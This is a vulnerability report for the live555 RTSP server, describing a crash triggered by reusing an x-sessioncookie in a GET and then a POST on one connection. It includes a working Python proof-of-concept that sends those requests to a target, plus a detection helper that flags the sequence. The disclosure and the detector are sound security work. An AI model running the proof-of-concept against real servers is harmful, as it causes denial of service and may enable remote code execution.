Description
ISSUE DESCRIPTION
The project website: http://www.live555.com/liveMedia/
I found a new way to make RTSPServer crash in the latest version, 0.93, when RTSP-over-HTTP tunneling is supported.
I only need to send two HTTP requests in one TCP connection.
The problem occurs in RTSPServer.cpp:853, which calls handleHTTPCmd_TunnelingPOST.
If I first send an HTTP GET packet with a specific sessionCookie, and then send an HTTP POST packet with the same sessionCookie in the same TCP connection,
RTSPServer will call an invalid virtual function pointer in the readSocket function (GroupsockHelper.cpp); the pointer value comes from the heap and may be controlled.
Attack PoC Python code:
```python
from socket import *

target_ip = REMOTE_SERVER_IP  # placeholder from the report: set to the test server's IP
target_port = 554  # or 8554

tcp = socket(AF_INET, SOCK_STREAM)
tcp.connect((target_ip, target_port))

# First request: HTTP GET carrying the tunneling session cookie
http_request_GET = '''GET / HTTP/1.1\r
x-sessioncookie: AAAAABBBBBB\r
Accept: application/text\r\n\r\n'''

# Second request: HTTP POST with the same session cookie, on the same TCP connection
http_request_POST = '''POST / HTTP/1.1\r
x-sessioncookie: AAAAABBBBBB\r
Accept: application/text\r\n\r
This is test data\r\n'''

tcp.send(http_request_GET.encode())  # .encode() added so the PoC also runs under Python 3
data = tcp.recv(1024)
tcp.send(http_request_POST.encode())
tcp.close()
```
You can build a test binary from https://github.com/rgaufman/live555 and run the PoC against the live555MediaServer binary for verification.
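The trigger described above is unusual on the wire: in normal RTSP-over-HTTP tunneling the GET and the POST that share an `x-sessioncookie` arrive on two separate TCP connections, whereas this crash needs both on one connection. The following detection helper, added here as an example and not part of the original report or the live555 project, parses the HTTP requests seen on a single connection and flags a POST whose `x-sessioncookie` was already presented by a GET on that same connection. The two sample requests are constructed to mirror the PoC; `find_tunnel_reuse` and `parse_request` are names chosen for this example.

```python
from typing import Dict, Iterable, List, Tuple

# Constructed sample: the two requests the report sends on ONE TCP connection,
# GET first and then POST, both carrying the same x-sessioncookie.
SAMPLE_CONNECTION = [
    b"GET / HTTP/1.1\r\nx-sessioncookie: AAAAABBBBBB\r\nAccept: application/text\r\n\r\n",
    b"POST / HTTP/1.1\r\nx-sessioncookie: AAAAABBBBBB\r\nAccept: application/text\r\n\r\nThis is test data\r\n",
]


def parse_request(raw: bytes) -> Tuple[str, Dict[str, str]]:
    """Return (METHOD, headers) for one raw HTTP request; header names are lower-cased."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method = lines[0].split(" ", 1)[0].upper() if lines and lines[0] else ""
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, headers


def find_tunnel_reuse(requests: Iterable[bytes]) -> List[str]:
    """Flag a POST that reuses an x-sessioncookie already seen on a GET of the same connection.

    A POST whose cookie was never seen on a GET on this connection is not flagged:
    that is the normal tunneling pattern, where the GET lives on another connection.
    """
    cookies_from_get = set()
    alerts: List[str] = []
    for idx, raw in enumerate(requests):
        method, headers = parse_request(raw)
        cookie = headers.get("x-sessioncookie")
        if cookie is None:
            continue
        if method == "GET":
            cookies_from_get.add(cookie)
        elif method == "POST" and cookie in cookies_from_get:
            alerts.append(
                f"request #{idx}: POST reuses tunneling cookie {cookie!r} "
                f"from an earlier GET on the same TCP connection"
            )
    return alerts


if __name__ == "__main__":
    for alert in find_tunnel_reuse(SAMPLE_CONNECTION):
        print(alert)
```

Feed the function the ordered list of requests reassembled from one TCP stream (from a sensor or a proxy in front of the RTSP/HTTP tunneling port); one alert per connection is enough to single out this request sequence for investigation, and the same per-connection state can be used by a front-end proxy to reject the second request instead of forwarding it.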
Original vulnerability discoverer:
许彬彬 Xubinbin
IMPACT
It causes a DoS and potentially remote command execution in version 0.93 (I verified), and possibly in all earlier versions (this is just my unverified guess).